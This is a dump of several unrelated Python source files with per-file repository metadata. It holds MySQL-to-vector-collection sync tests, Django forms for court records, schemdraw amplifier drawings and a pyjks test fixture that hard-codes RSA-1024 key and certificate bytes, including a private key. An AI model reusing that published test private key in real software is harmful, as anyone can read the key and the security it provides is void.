self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.000001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# send inc data
ret = self.mysql_client.execute_batch_sql('data/test_multi_collections_inc.sql')
self.assertEqual(ret, 0)
time.sleep(10)
# query result
topk = 300
for i in range(0, collection_count):
collection = 'test_multi_collections_' + str(i)
status, response = self.query(collection, topk=topk)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 300
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# def test_suspend_and_resume_collection(self):
# # create collection
# collection_name = 'test_mysql_restart_with_full_mode'
# schema = self.create_schema(collection_name,
# repository_table=collection_name,
# index_columns=["column1"],
# index_dimensions=[16])
# status = self.client.create_collection(schema)
# self.assertEqual(status.code, 0)
# # suspend collection
# status = self.client.suspend_collection(collection_name)
# logging.info("suspend collection result: %s", data)
# self.assertEqual(status.code, 0)
# # send data
# ret = self.mysql_client.execute_batch_sql('data/test_suspend_and_resume_collection_full.sql')
# self.assertEqual(ret, 0)
# time.sleep(2)
# # query result
# status, response = self.query(collection_name)
# self.assertTrue(status.ok())
# logging.info("query result: %s", response)
# results = response.results
# self.assertEqual(len(results), 1)
# documents = results[0]
# self.assertEqual(len(documents), 0)
# # resume collection
# status = self.client.resume_collection(collection_name)
# logging.info("resume collection result: %s", data)
# self.assertEqual(status.code, 0)
# time.sleep(10)
# # query result
# query = self.create_query(collection_name, 300)
# status, response = self.query(collection_name)
# self.assertTrue(status.ok())
# logging.info("query result: %s", response)
# results = response.results
# self.assertEqual(len(results), 1)
# documents = results[0]
# count = 300
# self.assertEqual(len(documents), count)
# for i in range(0, count):
# self.assertEqual(documents[i].primary_key, i + 1)
# self.assertEqual(documents[i].score, i * i)
# self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
# 11.111 + i, delta=0.001)
# self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
def test_invalid_lsn_info(self):
# send data
ret = self.mysql_client.execute_batch_sql('data/test_invalid_lsn_info_full.sql')
self.assertEqual(ret, 0)
time.sleep(5)
# create collection
collection_name = 'test_invalid_lsn_info'
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name, topk=300)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 100
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# get latest lsn
latest_lsn = self.get_latest_lsn(collection_name)
self.assertEqual(latest_lsn.lsn, 100)
file_name = latest_lsn.context.split(';')[0]
# stop mysql repository
self.server_utils.stop_mysql_repo()
# mysql flush logs
ret = self.mysql_client.execute("flush logs;flush logs; flush logs;")
self.assertEqual(ret, 0)
# purge binlog
ret = self.mysql_client.purge_binlog(file_name)
self.assertEqual(ret, 0)
# start mysql repository
self.server_utils.start_mysql_repo()
# send data
ret = self.mysql_client.execute_batch_sql('data/test_invalid_lsn_info_inc.sql')
self.assertEqual(ret, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name, topk=300)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 300
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
def test_forward_with_charset_utf8(self):
collection_name = 'test_forward_with_charset_utf8'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_charset_utf8_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], ('第一个字段'))
self.assertEqual(documents[i].forward_column_values['f2'], ('定长字段'))
self.assertEqual(documents[i].forward_column_values['f3'], ('我是谁'))
self.assertEqual(documents[i].forward_column_values['f4'], ('第三个字段'))
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_charset_utf8_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 6
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], ('第一个字段'))
self.assertEqual(documents[i].forward_column_values['f2'], ('定长字段'))
self.assertEqual(documents[i].forward_column_values['f3'], ('我是谁'))
self.assertEqual(documents[i].forward_column_values['f4'], ('第三个字段'))
def test_forward_with_charset_gbk(self):
collection_name = 'test_forward_with_charset_gbk'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_charset_gbk_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], ('第一个字段'))
self.assertEqual(documents[i].forward_column_values['f2'], ('定长字段'))
self.assertEqual(documents[i].forward_column_values['f3'], ('我是谁'))
self.assertEqual(documents[i].forward_column_values['f4'], ('第三个字段'))
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_charset_gbk_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 6
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], ('第一个字段'))
self.assertEqual(documents[i].forward_column_values['f2'], ('定长字段'))
self.assertEqual(documents[i].forward_column_values['f3'], ('我是谁'))
self.assertEqual(documents[i].forward_column_values['f4'], ('第三个字段'))
def test_one_field_both_index_and_forward(self):
collection_name = 'test_one_field_both_index_and_forward'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_one_field_both_index_and_forward_full.sql')
self.assertEqual(ret, 0)
# create collection
schema = self.create_schema(collection_name,
repository_table=collection_name,
forward_columns=["f1", "column1"],
index_columns=["column1", "column2"],
index_dimensions=[16, 16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], (str(i + 1) * 16))
self.assertEqual(documents[i].forward_column_values['column1'], '[1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,' + str(i + 1) + ']')
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_one_field_both_index_and_forward_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 6
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], (str(i + 1) * 16))
self.assertEqual(documents[i].forward_column_values['column1'], '[1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,' + str(i + 1) + ']')
if __name__ == '__main__':
unittest.main()
| 40.086937
| 123
| 0.650225
| 11,132
| 88,071
| 4.964068
| 0.030632
| 0.154452
| 0.135505
| 0.135722
| 0.94202
| 0.931071
| 0.913916
| 0.903493
| 0.899005
| 0.890138
| 0
| 0.032947
| 0.220095
| 88,071
| 2,196
| 124
| 40.105191
| 0.771573
| 0.111444
| 0
| 0.834706
| 0
| 0.001267
| 0.085678
| 0.048634
| 0
| 0
| 0
| 0
| 0.395187
| 1
| 0.025332
| false
| 0
| 0.008233
| 0.000633
| 0.037365
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c3f61948e2cd9e7d8b651e8a7e9f4cf6f997b88b
| 2,980
|
py
|
Python
|
apps/Courts/forms.py
|
steve-njuguna-k/Kenya-ePolice
|
561c33de242acf7f1d02af6395913a4a389b427f
|
[
"MIT"
] | 1
|
2022-02-26T20:15:33.000Z
|
2022-02-26T20:15:33.000Z
|
apps/Courts/forms.py
|
steve-njuguna-k/Kenya-ePolice
|
561c33de242acf7f1d02af6395913a4a389b427f
|
[
"MIT"
] | null | null | null |
apps/Courts/forms.py
|
steve-njuguna-k/Kenya-ePolice
|
561c33de242acf7f1d02af6395913a4a389b427f
|
[
"MIT"
] | null | null | null |
from django import forms
from apps.Accused.models import AccusedPerson
from apps.Courts.models import COURTS, VERDICT, Court
class AddCourtInfoForm(forms.Form):
court_number = forms.CharField(max_length=50, required=True, widget=forms.TextInput(attrs={'id': 'court_number', 'class': 'form-control mb-4', 'name': 'court_number', 'placeholder': 'Court Number'}))
accused_person = forms.ChoiceField(required=True, widget=forms.Select(attrs={'id': 'accused_person', 'class': 'form-control mb-4', 'name': 'accused_person', 'placeholder': 'Accused Person'}))
court = forms.ChoiceField(choices=COURTS, required=True, widget=forms.Select(attrs={'id': 'court', 'class': 'form-control mb-4', 'name': 'court', 'placeholder': 'Court'}))
court_verdict = forms.ChoiceField(choices=VERDICT, required=True, widget=forms.Select(attrs={'id': 'court_verdict', 'class': 'form-control mb-4', 'name': 'court_verdict', 'placeholder': 'Verdict'}))
scheduled_on = forms.DateField(required=True, widget=forms.DateInput(attrs={'type': 'date', 'id': 'scheduled_on', 'class': 'form-control mb-4', 'name': 'scheduled_on', 'placeholder': 'Scheduled On'}))
def __init__(self, *args, **kwargs):
super(AddCourtInfoForm, self).__init__(*args, **kwargs)
self.fields['accused_person'].choices = [(e.pk, f"{e.first_name}" + ' ' + f"{e.middle_name}" + ' ' + f"{e.last_name}") for e in AccusedPerson.objects.all()]
class Meta:
model = Court
fields = ['court_number', 'accused_person', 'court', 'court_verdict', 'scheduled_on']
class EditCourtInfoForm(forms.Form):
court_number = forms.CharField(max_length=50, required=True, widget=forms.TextInput(attrs={'id': 'court_number', 'class': 'form-control mb-4', 'name': 'court_number', 'placeholder': 'Court Number'}))
accused_person = forms.ChoiceField(required=True, widget=forms.Select(attrs={'id': 'accused_person', 'class': 'form-control mb-4', 'name': 'accused_person', 'placeholder': 'Accused Person'}))
court = forms.ChoiceField(choices=COURTS, required=True, widget=forms.Select(attrs={'id': 'court', 'class': 'form-control mb-4', 'name': 'court', 'placeholder': 'Court'}))
court_verdict = forms.ChoiceField(choices=VERDICT, required=True, widget=forms.Select(attrs={'id': 'court_verdict', 'class': 'form-control mb-4', 'name': 'court_verdict', 'placeholder': 'Verdict'}))
scheduled_on = forms.DateField(required=True, widget=forms.DateInput(attrs={'type': 'date', 'id': 'scheduled_on', 'class': 'form-control mb-4', 'name': 'scheduled_on', 'placeholder': 'Scheduled On'}))
def __init__(self, *args, **kwargs):
super(EditCourtInfoForm, self).__init__(*args, **kwargs)
self.fields['accused_person'].choices = [(e.pk, f"{e.first_name}" + ' ' + f"{e.middle_name}" + ' ' + f"{e.last_name}") for e in AccusedPerson.objects.all()]
class Meta:
model = Court
fields = ['court_number', 'accused_person', 'court', 'court_verdict', 'scheduled_on']
| 90.30303
| 204
| 0.688255
| 374
| 2,980
| 5.328877
| 0.160428
| 0.078274
| 0.090316
| 0.115404
| 0.909182
| 0.909182
| 0.909182
| 0.909182
| 0.909182
| 0.909182
| 0
| 0.005337
| 0.119799
| 2,980
| 33
| 205
| 90.30303
| 0.75448
| 0
| 0
| 0.740741
| 0
| 0
| 0.321369
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.111111
| 0
| 0.703704
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
616d78103599bdc7510e1cda3bffce6bd889320b
| 5,608
|
py
|
Python
|
tests/expected/RSA1024.py
|
castrapel/pyjks
|
f32dd209437f748949053be70f57ab1e80b5a7e3
|
[
"MIT"
] | 92
|
2016-10-03T07:54:39.000Z
|
2022-03-29T00:38:45.000Z
|
tests/expected/RSA1024.py
|
castrapel/pyjks
|
f32dd209437f748949053be70f57ab1e80b5a7e3
|
[
"MIT"
] | 46
|
2016-09-09T03:13:40.000Z
|
2022-03-10T22:54:12.000Z
|
tests/expected/RSA1024.py
|
castrapel/pyjks
|
f32dd209437f748949053be70f57ab1e80b5a7e3
|
[
"MIT"
] | 30
|
2016-10-07T16:12:11.000Z
|
2022-02-04T21:34:03.000Z
|
public_key = b"\x30\x81\x9f\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x03\x81\x8d\x00\x30\x81\x89\x02\x81\x81\x00\xc4\x78\x0b" + \
b"\xdf\xf0\xc6\x38\x3d\xb7\x52\x66\x28\x48\xdc\x0f\x5a\x68\xe9\x79\x95\xb9\xcc\x59\xfc\x49\x6b\x0b\x1d\x3c\x29\x8f\x72\x1e\x89\x5e" + \
b"\x27\x9a\xe8\x2a\x83\x4f\x80\x87\xbb\xf6\x63\x2d\xdd\x0f\x57\xb5\x59\xbb\x81\xe7\xc5\x3d\x7b\xa1\x73\x64\xb1\xfe\xb8\xc7\xae\x4e" + \
b"\xc3\xdb\x91\xc4\x60\xad\x10\xe6\xe5\x7f\xdf\x79\xad\xb6\x86\x77\x0e\xb7\x89\x92\xef\x93\x72\xb7\xe3\xaa\x70\x3b\xf7\x8e\xc5\x43" + \
b"\x82\x1f\x0d\x55\x39\xb9\xfb\x46\xf5\xcc\xdd\x45\xb5\x08\x34\x38\xdb\x87\x8e\x3e\xda\x33\x75\x94\x9e\x30\xde\x00\x47\x02\x03\x01" + \
b"\x00\x01"
private_key = b"\x30\x82\x02\x76\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x04\x82\x02\x60\x30\x82\x02\x5c\x02\x01" + \
b"\x00\x02\x81\x81\x00\xc4\x78\x0b\xdf\xf0\xc6\x38\x3d\xb7\x52\x66\x28\x48\xdc\x0f\x5a\x68\xe9\x79\x95\xb9\xcc\x59\xfc\x49\x6b\x0b" + \
b"\x1d\x3c\x29\x8f\x72\x1e\x89\x5e\x27\x9a\xe8\x2a\x83\x4f\x80\x87\xbb\xf6\x63\x2d\xdd\x0f\x57\xb5\x59\xbb\x81\xe7\xc5\x3d\x7b\xa1" + \
b"\x73\x64\xb1\xfe\xb8\xc7\xae\x4e\xc3\xdb\x91\xc4\x60\xad\x10\xe6\xe5\x7f\xdf\x79\xad\xb6\x86\x77\x0e\xb7\x89\x92\xef\x93\x72\xb7" + \
b"\xe3\xaa\x70\x3b\xf7\x8e\xc5\x43\x82\x1f\x0d\x55\x39\xb9\xfb\x46\xf5\xcc\xdd\x45\xb5\x08\x34\x38\xdb\x87\x8e\x3e\xda\x33\x75\x94" + \
b"\x9e\x30\xde\x00\x47\x02\x03\x01\x00\x01\x02\x81\x80\x01\x67\xee\x85\xd2\xbe\x48\x66\xc0\xaa\x19\x4b\x0e\x82\x6c\xa5\xb3\xfc\x7f" + \
b"\xbf\x3f\x8e\x23\xd2\xb7\x5f\xc9\xbb\x92\xd3\xa5\x50\x26\xc1\xca\xe7\xb3\xa7\x17\xae\xca\xe1\xdb\x96\xcf\xc3\x93\xef\x72\x0d\xa9" + \
b"\xa1\x93\xc2\xf1\x3a\xab\x1e\xf8\x5f\xd0\x07\xaa\x0f\xfb\x40\x13\xe8\x0a\x84\xc3\x33\x0e\xad\x8a\x22\xf0\x2b\xed\x35\x30\x02\x59" + \
b"\x17\x2a\xc7\xe5\x68\x58\xb0\x6d\x8f\x69\x19\x81\x69\xff\x67\x1e\x85\xe2\x35\x89\xd8\xc7\x53\xc5\xa4\x57\x1a\x80\x4b\xa4\xa3\xa7" + \
b"\x21\x59\x49\x0f\xf1\x42\x50\xac\x35\x7c\x63\xfd\x31\x02\x41\x00\xe2\x3a\xed\x49\xd8\x99\x4b\xf9\x9b\xc5\x24\x61\xa7\x6c\xff\xd5" + \
b"\xd9\xf5\xd8\x66\xec\xce\xda\x52\xa4\x63\x63\x35\xd4\x52\xc3\x8e\xaf\xd4\x60\x2c\x04\x7b\xba\xb9\x9e\x5d\x7e\x58\x47\xad\x33\xb2" + \
b"\xe9\x5f\xc1\xe4\xeb\x9b\x79\x88\x72\x1c\x82\x1d\xa4\xe7\x73\x09\x02\x41\x00\xde\x52\x8b\x71\x0b\xcf\xaf\xa1\x8a\x25\xa6\xf6\x4d" + \
b"\xe0\x87\x6d\x4d\xce\xca\x96\x65\x2b\x0f\xd0\xbc\x6b\x71\x26\xa7\x37\xef\xac\xa7\xbf\x41\xc3\xf6\xdb\xce\xba\x6b\x02\x3c\x45\xc7" + \
b"\x52\x3d\x98\xce\xf9\xb5\x30\x3d\xd6\xce\xf8\x18\xb8\x4f\x01\x09\xcb\x1c\xcf\x02\x40\x31\x7d\x94\xa5\x80\x05\xe1\x32\x04\xda\xb6" + \
b"\xdf\xca\x21\xb5\x42\x12\x41\x8f\x0a\xcd\x29\x5f\x67\x8e\xe0\xd3\x36\x56\x71\x98\xa8\x61\x5c\xc3\x81\x3d\xa5\xd7\xae\x7d\xaf\x94" + \
b"\x51\x39\xb4\xf1\x47\x65\x78\x76\x51\x5f\x1d\x8f\x13\xc3\x6a\xeb\x28\x13\x08\x33\x09\x02\x40\x4d\xff\xe5\xde\x3e\x87\x9a\x15\xf1" + \
b"\xd2\xed\xf6\x02\x32\xa1\x30\xef\x18\x7b\x29\x32\xcb\x5d\xdc\x1d\x0f\x10\xfe\xbf\xb2\x37\x4b\x7a\xfa\xf6\x06\xdb\xc8\x18\x8a\x7c" + \
b"\xda\xa6\xec\xd0\x56\x81\x37\xe8\x7d\xe1\x5c\xd0\x85\x59\xcd\xdf\x56\x62\x99\x79\xa7\x22\x2f\x02\x41\x00\xcc\x59\xe0\x6e\x40\xba" + \
b"\x16\xdc\x4c\x81\xeb\x84\x1c\x2a\x84\xee\x10\xd9\xa5\x93\x28\xe2\x04\x30\x9d\xfa\x0b\x19\xbf\x37\xc4\xb1\x84\x73\x49\xb1\x84\xac" + \
b"\x27\xd3\x81\xc3\x0d\x44\xdd\x0e\x50\x68\x06\xc1\xaf\x80\x71\x7a\x36\x6e\x0a\xf1\x7c\xd9\xdd\x31\x74\xed"
certs = [b"\x30\x82\x01\x98\x30\x82\x01\x01\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x30" + \
b"\x12\x31\x10\x30\x0e\x06\x03\x55\x04\x03\x0c\x07\x52\x53\x41\x31\x30\x32\x34\x30\x1e\x17\x0d\x31\x36\x30\x35\x31\x35\x31\x38\x35" + \
b"\x31\x30\x31\x5a\x17\x0d\x31\x38\x30\x35\x31\x35\x31\x38\x35\x31\x30\x31\x5a\x30\x12\x31\x10\x30\x0e\x06\x03\x55\x04\x03\x0c\x07" + \
b"\x52\x53\x41\x31\x30\x32\x34\x30\x81\x9f\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x03\x81\x8d\x00\x30\x81\x89" + \
b"\x02\x81\x81\x00\xc4\x78\x0b\xdf\xf0\xc6\x38\x3d\xb7\x52\x66\x28\x48\xdc\x0f\x5a\x68\xe9\x79\x95\xb9\xcc\x59\xfc\x49\x6b\x0b\x1d" + \
b"\x3c\x29\x8f\x72\x1e\x89\x5e\x27\x9a\xe8\x2a\x83\x4f\x80\x87\xbb\xf6\x63\x2d\xdd\x0f\x57\xb5\x59\xbb\x81\xe7\xc5\x3d\x7b\xa1\x73" + \
b"\x64\xb1\xfe\xb8\xc7\xae\x4e\xc3\xdb\x91\xc4\x60\xad\x10\xe6\xe5\x7f\xdf\x79\xad\xb6\x86\x77\x0e\xb7\x89\x92\xef\x93\x72\xb7\xe3" + \
b"\xaa\x70\x3b\xf7\x8e\xc5\x43\x82\x1f\x0d\x55\x39\xb9\xfb\x46\xf5\xcc\xdd\x45\xb5\x08\x34\x38\xdb\x87\x8e\x3e\xda\x33\x75\x94\x9e" + \
b"\x30\xde\x00\x47\x02\x03\x01\x00\x01\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x03\x81\x81\x00\xbb\x77\x85\xb5" + \
b"\x4f\x1c\x4b\x39\x27\x15\x10\x5e\x41\x02\x91\xae\xcb\x97\x1a\xf0\xe8\xae\xf7\xd7\x01\x46\x84\x82\x04\x97\x3f\x77\x90\xf5\x90\xe8" + \
b"\x08\xd0\xc6\xa7\x65\xeb\xc2\xca\xdf\x93\xf0\xd9\xcd\xed\xf4\x1f\xe3\x10\x1d\xc5\x20\x6a\xd7\xc1\xd0\x27\x29\xfc\x3f\x7c\x98\x1d" + \
b"\xf6\x2c\x3d\xca\xb1\xc5\xb1\x3d\x4b\x74\xc6\xdc\xac\xda\xa3\xd3\xe0\x2e\xaf\xb0\x0e\x57\x24\x1b\xb1\x90\x5e\xee\xba\x8c\x2d\xd9" + \
b"\x02\x1b\x93\x09\xe1\x60\xc3\x0c\xf0\x7a\x85\xed\x1c\x2d\x95\xe8\x13\x66\x33\xbd\x61\x25\x60\xe3\x64\x66\x42\x61"]
| 140.2
| 149
| 0.65781
| 1,252
| 5,608
| 2.944888
| 0.198882
| 0.014646
| 0.012205
| 0.016273
| 0.458096
| 0.458096
| 0.458096
| 0.441009
| 0.402766
| 0.38812
| 0
| 0.322249
| 0.099144
| 5,608
| 39
| 150
| 143.794872
| 0.407561
| 0
| 0
| 0
| 0
| 0.974359
| 0.861626
| 0.8602
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
61724e9422d1cdd9f9679bdc95f08e985c05223c
| 2,430
|
py
|
Python
|
pyelectric/electronic/amplifier/fixed_polarization_tbj/drawing.py
|
luanws/pyelectric
|
047f7abb06baeda6ae97ba3b4c0e4f08e3e61dc6
|
[
"Apache-2.0"
] | null | null | null |
pyelectric/electronic/amplifier/fixed_polarization_tbj/drawing.py
|
luanws/pyelectric
|
047f7abb06baeda6ae97ba3b4c0e4f08e3e61dc6
|
[
"Apache-2.0"
] | null | null | null |
pyelectric/electronic/amplifier/fixed_polarization_tbj/drawing.py
|
luanws/pyelectric
|
047f7abb06baeda6ae97ba3b4c0e4f08e3e61dc6
|
[
"Apache-2.0"
] | null | null | null |
from schemdraw import Drawing
from schemdraw import elements as elm
from .input import Input
def draw_void():
drawing = Drawing()
transistor = drawing.add(elm.transistors.BjtNpn().right())
drawing.push()
drawing += elm.Resistor().up().label('Rc')
drawing += elm.Line().left().length(drawing.unit/2)
drawing.push()
drawing += elm.Dot()
drawing += elm.SourceV().up().reverse().label('Vcc')
drawing += elm.Ground().left()
drawing.pop()
drawing += elm.Line().left().length(drawing.unit/2)
drawing += elm.Resistor().down().label('Rb')
drawing += elm.Line().down().length(0.24*drawing.unit)
drawing += elm.Dot()
drawing.push()
drawing += elm.Line().to(transistor.base)
drawing.pop()
drawing += elm.Line().left().length(drawing.unit/4)
drawing += elm.Capacitor().left().reverse().label('Ci')
drawing += elm.Line().left().length(drawing.unit/4)
drawing += elm.Dot().label('Vi')
drawing += elm.Line().at(transistor.emitter).down().length(3*drawing.unit/4)
drawing += elm.Ground()
drawing.pop()
drawing += elm.Dot()
drawing += elm.Capacitor().right().label('Co')
drawing += elm.Dot().label('Vo')
return drawing
def draw(amplifier_input: Input):
drawing = Drawing()
transistor = drawing.add(elm.transistors.BjtNpn().right())
drawing.push()
drawing += elm.Resistor().up().label(str(amplifier_input.Rc))
drawing += elm.Line().left().length(drawing.unit/2)
drawing.push()
drawing += elm.Dot()
drawing += elm.SourceV().up().reverse().label(str(amplifier_input.Vcc))
drawing += elm.Ground().left()
drawing.pop()
drawing += elm.Line().left().length(drawing.unit/2)
drawing += elm.Resistor().down().label(str(amplifier_input.Rb))
drawing += elm.Line().down().length(0.24*drawing.unit)
drawing += elm.Dot()
drawing.push()
drawing += elm.Line().to(transistor.base)
drawing.pop()
drawing += elm.Line().left().length(drawing.unit/4)
drawing += elm.Capacitor().left().reverse().label('Ci')
drawing += elm.Line().left().length(drawing.unit/4)
drawing += elm.Dot().label('Vi')
drawing += elm.Line().at(transistor.emitter).down().length(3*drawing.unit/4)
drawing += elm.Ground()
drawing.pop()
drawing += elm.Dot()
drawing += elm.Capacitor().right().label('Co')
drawing += elm.Dot().label('Vo')
return drawing
| 28.588235
| 80
| 0.626749
| 311
| 2,430
| 4.881029
| 0.160772
| 0.250329
| 0.129117
| 0.094862
| 0.890646
| 0.890646
| 0.890646
| 0.890646
| 0.890646
| 0.890646
| 0
| 0.008902
| 0.167901
| 2,430
| 84
| 81
| 28.928571
| 0.74184
| 0
| 0
| 0.819672
| 0
| 0
| 0.009465
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032787
| false
| 0
| 0.04918
| 0
| 0.114754
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
61a46475e2b713c9cfcafba8872b3e6e37fa7059
| 160,881
|
py
|
Python
|
pytest_t31.py
|
YuMiao329/ecg-analysis
|
b37d4a0a367bb2c933bb2ac46bde5a363a9b010a
|
[
"MIT"
] | null | null | null |
pytest_t31.py
|
YuMiao329/ecg-analysis
|
b37d4a0a367bb2c933bb2ac46bde5a363a9b010a
|
[
"MIT"
] | null | null | null |
pytest_t31.py
|
YuMiao329/ecg-analysis
|
b37d4a0a367bb2c933bb2ac46bde5a363a9b010a
|
[
"MIT"
] | null | null | null |
